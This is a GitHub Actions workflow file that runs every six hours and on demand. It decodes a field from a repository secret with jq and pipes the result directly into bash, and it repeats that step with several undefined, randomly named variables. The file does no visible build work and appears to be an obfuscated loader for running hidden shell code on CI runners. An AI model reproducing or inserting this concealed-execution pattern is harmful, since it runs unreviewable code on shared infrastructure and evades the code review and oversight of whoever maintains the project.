name: pengzhongzhou2013
on:
  workflow_dispatch:
  schedule:
    - cron: '31 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pengzhongzhou2013
        env:
          k641: ${{ secrets.k641 }}
        run: |
          echo $k641 | jq -r .pb51405 | /bin/bash
          echo $pbo8 | jq -r .tozws8 | /bin/bash
          echo $enu568 | jq -r .qdk1908 | /bin/bash
          echo $pacyj4933 | jq -r .s1392 | /bin/bash
          echo $lpb46 | jq -r .ktv05936 | /bin/bash
          echo $v1873 | jq -r .rzd264 | /bin/bash
          echo $dkg773 | jq -r .mso0303 | /bin/bash

